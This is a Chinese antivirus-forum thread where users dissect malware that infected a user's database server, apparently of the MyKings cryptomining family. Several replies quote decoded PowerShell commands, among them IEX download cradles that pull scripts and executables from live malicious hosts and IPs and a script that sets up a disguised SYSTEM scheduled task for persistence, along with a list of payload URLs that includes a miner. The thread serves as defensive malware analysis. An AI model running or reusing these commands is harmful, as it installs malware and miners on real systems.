楼主: LovelyTim
收起左侧

[病毒样本] 数据库服务器病毒 8X

  [复制链接]
jiajia2010
发表于 2022-6-7 22:42:31 | 显示全部楼层
本帖最后由 jiajia2010 于 2022-6-7 23:16 编辑

干了挺多事,楼主注意检查一下吧dll运行的时候会把楼主主机ip,登录信息等上传到病毒作者指定的服务器。


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ghostByWolf
发表于 2022-6-8 09:01:36 | 显示全部楼层
LovelyTim 发表于 2022-6-7 10:24
火绒也提示处理了,但数据库密码和用户还是被改了

换个思路,有可能是通过数据库进去的
zkr090612
发表于 2022-6-8 09:12:09 | 显示全部楼层
联管kill all

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ly5162322
发表于 2022-6-8 11:55:39 | 显示全部楼层
服务器建议装EES 带防火墙 反正我觉得比较好用 最高记录15分钟拦截3000多次攻击
Wesly.Zhang
发表于 2022-6-8 12:52:58 | 显示全部楼层
LovelyTim 发表于 2022-6-7 11:14
顺便把日志文件也放上来
因为是两次一样的病毒
就只放最新记录

Base64解码部分代码
  1. IEX (New-Object Net.WebClient).DownloadString('http://mssql.loader0118.xyz:1433/mssql7.txt');
复制代码
Wesly.Zhang
发表于 2022-6-8 12:55:53 | 显示全部楼层
本帖最后由 Wesly.Zhang 于 2022-6-8 12:59 编辑

楼主,你这应该是中了敲竹杠吧?下载服务器指定文件,然后下载后更名存放,执行后防止重复运行,创建计划任务方便自己启动,关闭自身拉起的powershell等敏感操作。
当前upsupx2.exe无法下载,否则就能够静态分析看看到底是什么妖魔。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
坏脾气的男生
发表于 2022-6-8 13:21:41 | 显示全部楼层

这个软件扫描太慢了,受不了,而且可玩性不多
坏脾气的男生
发表于 2022-6-8 13:24:52 | 显示全部楼层
安天8个,全部杀

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
herofrederick
发表于 2022-6-8 13:48:13 | 显示全部楼层
本帖最后由 herofrederick 于 2022-6-8 14:20 编辑

IEX(New-ObjectNetWebClient)DownloadString('http://mssql.loader0118.xyz:1433/mssql7.txt');


mssql7.txt
net1.exe stop UI0Detect
IEX (New-Object Net.WebClient).DownloadString(('htqtp://77.73.69.34/Shell.txt' -replace 'q',''));
IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/download.txt')


download.txt
$client = new-object System.Net.WebClient
$client.DownloadFile('http://104.233.207.172:8172/upsupx2.exe','c:\windows\temp\conhoy.exe')
schtasks /run /tn oka
cmd /c taskkill /f /im conhoy.exe
cmd /c icacls c:\windows\temp\*.exe /reset
cmd /c schtasks /create /tn "MicrosoftsWindowsy" /tr "c:\windows\temp\conhoy.exe" /ru "system" /sc minute /mo 8 /f
schtasks /run /tn "MicrosoftsWindowsy"
cmd /c taskkill /f /im powershell.exe


估计是MyKings家族挖矿

明显是从web进来的然后通过sql执行的命令,要不然就是sql有弱口令

补充upsupx2请求http[:]//103.124.105.246/pld/cmd.txt
获取以下内容挨个下载

http[:]//103.145.106.242/upsupx2.exe|C:\windows\Temp\conhoy.exe|0http[:]//103.145.106.242/wmi.txt|C:\windows\Temp\wmia.bat|1http[:]//103.145.106.242/u.exe|C:\windows\Temp\u.exe|1http[:]//137.175.56.104/ntuser.rar|C:\windows\Temp\ntuser.dat|0http[:]//137.175.56.104/xmr1025.rar|c:\windows\inf\aspnet\lsma22.exe|0http[:]//137.175.56.104/20201117.rar|c:\windows\debug\item.dat|0

xmr1025挖矿程序
其他的懒的看
u.exe请求http[:]//172.83.155.170/ups.html获取ip 104.37.187.182
拼接后下载更多的exe和sys文件

红豆有绿豆
头像被屏蔽
发表于 2022-6-8 14:01:01 | 显示全部楼层

不要重复测试谢谢
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-9-25 13:25 , Processed in 0.084755 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表